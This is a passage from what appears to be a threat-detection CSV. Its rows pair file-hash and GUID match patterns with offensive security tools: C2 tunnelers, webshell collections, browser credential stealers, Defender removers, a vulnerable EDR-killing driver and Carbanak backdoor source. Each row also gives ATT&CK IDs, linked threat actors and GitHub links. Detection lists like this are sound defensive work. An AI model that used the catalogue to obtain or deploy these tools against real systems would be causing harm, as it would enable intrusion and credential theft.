- TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22608" "*1a88b6412bb1e6349948bc6abdc0eebb5df61cc8c0a7ec9709310a77dbc7bccb*",".{0,1000}1a88b6412bb1e6349948bc6abdc0eebb5df61cc8c0a7ec9709310a77dbc7bccb.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","22610" "*1A8C9BD8-1800-46B0-8E22-7D3823C68366*",".{0,1000}1A8C9BD8\-1800\-46B0\-8E22\-7D3823C68366.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create 
scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","#GUIDproject","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","22611" "*1A99EBED-6E53-469F-88B7-F4C3D2C96B07*",".{0,1000}1A99EBED\-6E53\-469F\-88B7\-F4C3D2C96B07.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#GUIDProject","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","22613" "*1a9b73e2c74c9c5b48ad54e0aa0babe1241d117bc7a9c4cdf7977380da23e089*",".{0,1000}1a9b73e2c74c9c5b48ad54e0aa0babe1241d117bc7a9c4cdf7977380da23e089.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22614" "*1aa328de71a7199a03005b39e9c8e73c2ca6f73e9d55615189cf21690f7cd6f9*",".{0,1000}1aa328de71a7199a03005b39e9c8e73c2ca6f73e9d55615189cf21690f7cd6f9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22616" "*1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea*",".{0,1000}1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22618" "*1aab058ee1e02a5d2b3cf8604b9bbeaa6dc2cf4a383cf43916a19169ec875a9c*",".{0,1000}1aab058ee1e02a5d2b3cf8604b9bbeaa6dc2cf4a383cf43916a19169ec875a9c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22619" "*1aade6ab28b468f362122c2b96f45f572a66142e09214b30467bc3d97a345d0b*",".{0,1000}1aade6ab28b468f362122c2b96f45f572a66142e09214b30467bc3d97a345d0b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22620" "*1aae160624edaabb7748ba4c5042c79672f48a5925aa392400c3aa96573d01df*",".{0,1000}1aae160624edaabb7748ba4c5042c79672f48a5925aa392400c3aa96573d01df.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource 
Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","22621" "*1aae21b70df4615e79ff0864773b793f6b4ec88e2f1b00fdd419622e775617e5*",".{0,1000}1aae21b70df4615e79ff0864773b793f6b4ec88e2f1b00fdd419622e775617e5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22622" "*1ab0edd5c7848f664b87d0ad9a7f2e081ea5500b13f38eaaf6a1720c2a7337fa*",".{0,1000}1ab0edd5c7848f664b87d0ad9a7f2e081ea5500b13f38eaaf6a1720c2a7337fa.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22623" "*1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3*",".{0,1000}1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22624" "*1ac060935cf018c68c0143a2a1647b3e11c305ff652abf603bb0caf1f9dedf50*",".{0,1000}1ac060935cf018c68c0143a2a1647b3e11c305ff652abf603bb0caf1f9dedf50.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22626" "*1ac39556a986e4338e44ab2e94fcc34fd12cd690feeef22161d255bd1067d7e1*",".{0,1000}1ac39556a986e4338e44ab2e94fcc34fd12cd690feeef22161d255bd1067d7e1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22627" "*1aca0bdeda834669cd00738ec80f1f092531d1b1d8f7927c05029f0978544035*",".{0,1000}1aca0bdeda834669cd00738ec80f1f092531d1b1d8f7927c05029f0978544035.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22630" "*1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a*",".{0,1000}1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22631" "*1ad1c6e6c95a5a5064706a0312e0668eda560fafd0ceea59eaf6441e3735a39d*",".{0,1000}1ad1c6e6c95a5a5064706a0312e0668eda560fafd0ceea59eaf6441e3735a39d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22633" "*1ad347c4e88e8425849acdf2ec2f35e690123f7eac1d16355df57b9f4d85632e*",".{0,1000}1ad347c4e88e8425849acdf2ec2f35e690123f7eac1d16355df57b9f4d85632e.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22634" "*1ada2351bf027363a8dd71c06a73a7450f52f6b85a0bd08e0e51d83b379172d7*",".{0,1000}1ada2351bf027363a8dd71c06a73a7450f52f6b85a0bd08e0e51d83b379172d7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22636" "*1ae56e7ebbdbbd3912b3bec2f08c065895e82492494c26d076cce466dd0572ad*",".{0,1000}1ae56e7ebbdbbd3912b3bec2f08c065895e82492494c26d076cce466dd0572ad.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22637" "*1ae74ae5b25ae884783a0bca12f63b026a78c123a36ba980f1f931087024354b*",".{0,1000}1ae74ae5b25ae884783a0bca12f63b026a78c123a36ba980f1f931087024354b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22638" "*1ae96f5eef721bc51a89dae07a4635d29531b2e11ee497e17619f00b07acf1b2*",".{0,1000}1ae96f5eef721bc51a89dae07a4635d29531b2e11ee497e17619f00b07acf1b2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22639" "*1aebc75f4a66ba1711c288235dad6ac01c59e8801e8a1c2151cbb7dfd4c2c098*",".{0,1000}1aebc75f4a66ba1711c288235dad6ac01c59e8801e8a1c2151cbb7dfd4c2c098.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#filehash","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","22641" "*1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba*",".{0,1000}1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22642" "*1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3*",".{0,1000}1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","22643" "*1af1c92c7a9a60a740d6351d935cb24d5c8ba7bde5a54bff8931a40bb6a2aa28*",".{0,1000}1af1c92c7a9a60a740d6351d935cb24d5c8ba7bde5a54bff8931a40bb6a2aa28.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22645" "*1af3fc48ae5984de558e620579cba8421fc8501a7494e4b0ec410c8caf302a85*",".{0,1000}1af3fc48ae5984de558e620579cba8421fc8501a7494e4b0ec410c8caf302a85.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22647" "*1af96d83e204abefa20c59e17e4a43ba2752360aadaecc0a8885537108f1aec3*",".{0,1000}1af96d83e204abefa20c59e17e4a43ba2752360aadaecc0a8885537108f1aec3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that 
uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22648" "*1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7*",".{0,1000}1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22650" "*1AFD1BA3-028A-4E0F-82A8-095F38694ECF*",".{0,1000}1AFD1BA3\-028A\-4E0F\-82A8\-095F38694ECF.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","#GUIDproject","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","22651" "*1aff544e58c3eda489ae9b59f32a10175d95e1aac12a4fbf25a40c40a1cc6c74*",".{0,1000}1aff544e58c3eda489ae9b59f32a10175d95e1aac12a4fbf25a40c40a1cc6c74.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black 
Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22652" "*1b00063bdd544b4c03f152baa78efa863cb073a8a068f4e8316489b3a0d61846*",".{0,1000}1b00063bdd544b4c03f152baa78efa863cb073a8a068f4e8316489b3a0d61846.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22653" "*1b191ef3f920d48b1f4b8e9db4df2cb518d3c067eeb29b7bbe4ea48c4392de65*",".{0,1000}1b191ef3f920d48b1f4b8e9db4df2cb518d3c067eeb29b7bbe4ea48c4392de65.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22655" "*1b1aefd0619b7d630dbb6a1ba16a77adfc9c26b608768d119e1bdf4d3da98ec7*",".{0,1000}1b1aefd0619b7d630dbb6a1ba16a77adfc9c26b608768d119e1bdf4d3da98ec7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22656" "*1b1b954cd8593a3d62bfc75524952c11499f269510fd1039a9ec5fa9655b92a7*",".{0,1000}1b1b954cd8593a3d62bfc75524952c11499f269510fd1039a9ec5fa9655b92a7.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","22657" "*1b1e2f33f8c7e670cc340e679cc6deb60a81143659e5383a747c72da84822fce*",".{0,1000}1b1e2f33f8c7e670cc340e679cc6deb60a81143659e5383a747c72da84822fce.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22658" "*1B1F64B3-B8A4-4BBB-BB66-F020E2D4F288*",".{0,1000}1B1F64B3\-B8A4\-4BBB\-BB66\-F020E2D4F288.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#GUIDproject","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","22659" 
"*1b209500451ebe2bbe420a1ff33d946fa9e9e00399abda9ebcf9b0258fbe7902*",".{0,1000}1b209500451ebe2bbe420a1ff33d946fa9e9e00399abda9ebcf9b0258fbe7902.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22660" "*1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2*",".{0,1000}1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","22661" "*1b2b249d1cc2d53c4d21bfbd0a1ab7548e2ac369b13bdba538c76ba7813ce595*",".{0,1000}1b2b249d1cc2d53c4d21bfbd0a1ab7548e2ac369b13bdba538c76ba7813ce595.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22662" "*1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656*",".{0,1000}1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22663" 
"*1b33fdc94279d8b040437fb7058747c6d151265df5fc3444c27a025daf83c988*",".{0,1000}1b33fdc94279d8b040437fb7058747c6d151265df5fc3444c27a025daf83c988.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22664" "*1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a*",".{0,1000}1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22666" "*1B3C96A3-F698-472B-B786-6FED7A205159*",".{0,1000}1B3C96A3\-F698\-472B\-B786\-6FED7A205159.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#GUIDproject","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","22668" "*1B3D331BD6ABC44B54119E00509215AE3EA4B482DDB0C9F0D21D71C24EC3B5B6*",".{0,1000}1B3D331BD6ABC44B54119E00509215AE3EA4B482DDB0C9F0D21D71C24EC3B5B6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22669" "*1B454840-E496-4F27-AA18-439A4E97BCC6*",".{0,1000}1B454840\-E496\-4F27\-AA18\-439A4E97BCC6.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","22672" "*1b46ed14bbd4feb50be61fb1f3535adbca65d4927a3f14eaa19202deebe29041*",".{0,1000}1b46ed14bbd4feb50be61fb1f3535adbca65d4927a3f14eaa19202deebe29041.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22673" "*1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec*",".{0,1000}1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22674" "*1b4c47566288f418c735f2330f1820a02dd7eaf44427bab650da097c013d9b41*",".{0,1000}1b4c47566288f418c735f2330f1820a02dd7eaf44427bab650da097c013d9b41.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
